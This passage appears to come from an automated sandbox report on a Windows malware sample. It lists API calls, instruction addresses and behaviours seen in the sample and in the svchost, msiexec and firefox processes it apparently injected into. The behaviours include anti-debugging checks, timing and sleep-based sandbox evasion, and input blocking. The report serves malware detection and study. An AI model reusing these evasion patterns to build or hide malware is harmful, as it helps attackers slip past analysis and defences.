            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BE8A2 push es; iretd 2_2_015BE957
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C626B push ecx; retf 2_2_015C626E
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BF41A pushad ; retf 2_2_015BF41B
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C9FBE push ecx; retf 2_2_015C9FBF
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C9E70 push ecx; retf 2_2_015C9E71
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05374529 pushad ; retf 2_2_0537452A
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05381DC7 push ss; retf 2_2_05381DCE
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537EF7F push ecx; retf 2_2_0537EF80
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05376E5D push B7E85DDEh; ret 2_2_05376E62
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05376938 push ecx; retf 2_2_0537693E
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05381974 pushfd ; ret 2_2_05381975
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537F0CD push ecx; retf 2_2_0537F0CE
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537B37A push ecx; retf 2_2_0537B37D
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05370BF3 push cs; ret 2_2_05370C3E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051721AD pushad ; retf 0004h3_2_0517223F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004440780_2_00444078
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeAPI/Special instruction interceptor: Address: 454A70C
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D144
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D764
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D324
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D364
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D004
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0FF74
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D864
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E rdtsc 1_2_0347088E
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 1.3 %
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe TID: 3180 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888 Thread sleep count: 121 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888 Thread sleep time: -242000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888 Thread sleep count: 9673 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888 Thread sleep time: -19346000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044BD29 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00475FE5
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044BF8D FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: firefox.exe, 00000004.00000002.5104537799.000001B8A9946000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
            Source: BlltrVxNMs.exe, 00000002.00000002.9379519530.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E rdtsc 1_2_0347088E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417583 LdrLoadDll,1_2_00417583
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_04549348 mov eax, dword ptr fs:[00000030h]0_2_04549348
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0454A978 mov eax, dword ptr fs:[00000030h]0_2_0454A978
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0454A9D8 mov eax, dword ptr fs:[00000030h]0_2_0454A9D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428347 mov eax, dword ptr fs:[00000030h]1_2_03428347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov eax, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D47B4 mov ecx, dword ptr fs:[00000030h]1_2_034D47B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CC7B0 mov eax, dword ptr fs:[00000030h]1_2_034CC7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CC7B0 mov eax, dword ptr fs:[00000030h]1_2_034CC7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C640 mov eax, dword ptr fs:[00000030h]1_2_0346C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C640 mov eax, dword ptr fs:[00000030h]1_2_0346C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346265C mov eax, dword ptr fs:[00000030h]1_2_0346265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346265C mov ecx, dword ptr fs:[00000030h]1_2_0346265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346265C mov eax, dword ptr fs:[00000030h]1_2_0346265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346666D mov esi, dword ptr fs:[00000030h]1_2_0346666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346666D mov eax, dword ptr fs:[00000030h]1_2_0346666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346666D mov eax, dword ptr fs:[00000030h]1_2_0346666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE660 mov eax, dword ptr fs:[00000030h]1_2_034BE660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430670 mov eax, dword ptr fs:[00000030h]1_2_03430670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472670 mov eax, dword ptr fs:[00000030h]1_2_03472670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472670 mov eax, dword ptr fs:[00000030h]1_2_03472670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504600 mov eax, dword ptr fs:[00000030h]1_2_03504600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C620 mov eax, dword ptr fs:[00000030h]1_2_0346C620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430630 mov eax, dword ptr fs:[00000030h]1_2_03430630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460630 mov eax, dword ptr fs:[00000030h]1_2_03460630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8633 mov esi, dword ptr fs:[00000030h]1_2_034B8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8633 mov eax, dword ptr fs:[00000030h]1_2_034B8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8633 mov eax, dword ptr fs:[00000030h]1_2_034B8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034306CF mov eax, dword ptr fs:[00000030h]1_2_034306CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA6C0 mov eax, dword ptr fs:[00000030h]1_2_034FA6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D86C2 mov eax, dword ptr fs:[00000030h]1_2_034D86C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C66D0 mov eax, dword ptr fs:[00000030h]1_2_034C66D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C66D0 mov eax, dword ptr fs:[00000030h]1_2_034C66D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE6D0 mov eax, dword ptr fs:[00000030h]1_2_034DE6D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C6E0 mov eax, dword ptr fs:[00000030h]1_2_0343C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034566E0 mov eax, dword ptr fs:[00000030h]1_2_034566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034566E0 mov eax, dword ptr fs:[00000030h]1_2_034566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC6F2 mov eax, dword ptr fs:[00000030h]1_2_034AC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC6F2 mov eax, dword ptr fs:[00000030h]1_2_034AC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440680 mov eax, dword ptr fs:[00000030h]1_2_03440680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438690 mov eax, dword ptr fs:[00000030h]1_2_03438690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC691 mov eax, dword ptr fs:[00000030h]1_2_034BC691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F86A8 mov eax, dword ptr fs:[00000030h]1_2_034F86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F86A8 mov eax, dword ptr fs:[00000030h]1_2_034F86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E547 mov eax, dword ptr fs:[00000030h]1_2_0344E547
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466540 mov eax, dword ptr fs:[00000030h]1_2_03466540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468540 mov eax, dword ptr fs:[00000030h]1_2_03468540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343254C mov eax, dword ptr fs:[00000030h]1_2_0343254C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6550 mov eax, dword ptr fs:[00000030h]1_2_034C6550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA553 mov eax, dword ptr fs:[00000030h]1_2_034FA553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C560 mov eax, dword ptr fs:[00000030h]1_2_0344C560
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E507 mov eax, dword ptr fs:[00000030h]1_2_0345E507
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432500 mov eax, dword ptr fs:[00000030h]1_2_03432500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C50D mov eax, dword ptr fs:[00000030h]1_2_0346C50D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C50D mov eax, dword ptr fs:[00000030h]1_2_0346C50D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC51D mov eax, dword ptr fs:[00000030h]1_2_034BC51D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344252B mov eax, dword ptr fs:[00000030h]1_2_0344252B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472539 mov eax, dword ptr fs:[00000030h]1_2_03472539
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5C6 mov eax, dword ptr fs:[00000030h]1_2_0346C5C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05C6 mov eax, dword ptr fs:[00000030h]1_2_034B05C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034665D0 mov eax, dword ptr fs:[00000030h]1_2_034665D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5E7 mov ebx, dword ptr fs:[00000030h]1_2_0346A5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5E7 mov eax, dword ptr fs:[00000030h]1_2_0346A5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE5E0 mov eax, dword ptr fs:[00000030h]1_2_034DE5E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC5FC mov eax, dword ptr fs:[00000030h]1_2_034BC5FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE588 mov eax, dword ptr fs:[00000030h]1_2_034AE588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE588 mov eax, dword ptr fs:[00000030h]1_2_034AE588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A580 mov eax, dword ptr fs:[00000030h]1_2_0346A580
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A580 mov eax, dword ptr fs:[00000030h]1_2_0346A580
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462594 mov eax, dword ptr fs:[00000030h]1_2_03462594
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC592 mov eax, dword ptr fs:[00000030h]1_2_034BC592
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B85AA mov eax, dword ptr fs:[00000030h]1_2_034B85AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034345B0 mov eax, dword ptr fs:[00000030h]1_2_034345B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034345B0 mov eax, dword ptr fs:[00000030h]1_2_034345B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440445 mov eax, dword ptr fs:[00000030h]1_2_03440445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0443 mov eax, dword ptr fs:[00000030h]1_2_034B0443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E45E mov eax, dword ptr fs:[00000030h]1_2_0345E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE461 mov eax, dword ptr fs:[00000030h]1_2_034BE461
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA464 mov eax, dword ptr fs:[00000030h]1_2_034FA464
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438470 mov eax, dword ptr fs:[00000030h]1_2_03438470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438470 mov eax, dword ptr fs:[00000030h]1_2_03438470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6400 mov eax, dword ptr fs:[00000030h]1_2_034C6400
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6400 mov eax, dword ptr fs:[00000030h]1_2_034C6400
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342640D mov eax, dword ptr fs:[00000030h]1_2_0342640D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034544D1 mov eax, dword ptr fs:[00000030h]1_2_034544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034544D1 mov eax, dword ptr fs:[00000030h]1_2_034544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E4EF mov eax, dword ptr fs:[00000030h]1_2_0346E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E4EF mov eax, dword ptr fs:[00000030h]1_2_0346E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364F0 mov eax, dword ptr fs:[00000030h]1_2_034364F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D44F8 mov eax, dword ptr fs:[00000030h]1_2_034D44F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D44F8 mov eax, dword ptr fs:[00000030h]1_2_034D44F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A4F0 mov eax, dword ptr fs:[00000030h]1_2_0346A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A4F0 mov eax, dword ptr fs:[00000030h]1_2_0346A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE4F2 mov eax, dword ptr fs:[00000030h]1_2_034BE4F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE4F2 mov eax, dword ptr fs:[00000030h]1_2_034BE4F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430485 mov ecx, dword ptr fs:[00000030h]1_2_03430485
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346648A mov eax, dword ptr fs:[00000030h]1_2_0346648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346648A mov eax, dword ptr fs:[00000030h]1_2_0346648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346648A mov eax, dword ptr fs:[00000030h]1_2_0346648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC490 mov eax, dword ptr fs:[00000030h]1_2_034BC490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034324A2 mov eax, dword ptr fs:[00000030h]1_2_034324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034324A2 mov ecx, dword ptr fs:[00000030h]1_2_034324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644A8 mov eax, dword ptr fs:[00000030h]1_2_034644A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C84BB mov eax, dword ptr fs:[00000030h]1_2_034C84BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E4BC mov eax, dword ptr fs:[00000030h]1_2_0346E4BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343AB70 mov eax, dword ptr fs:[00000030h]1_2_0343AB70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436B70 mov eax, dword ptr fs:[00000030h]1_2_03436B70
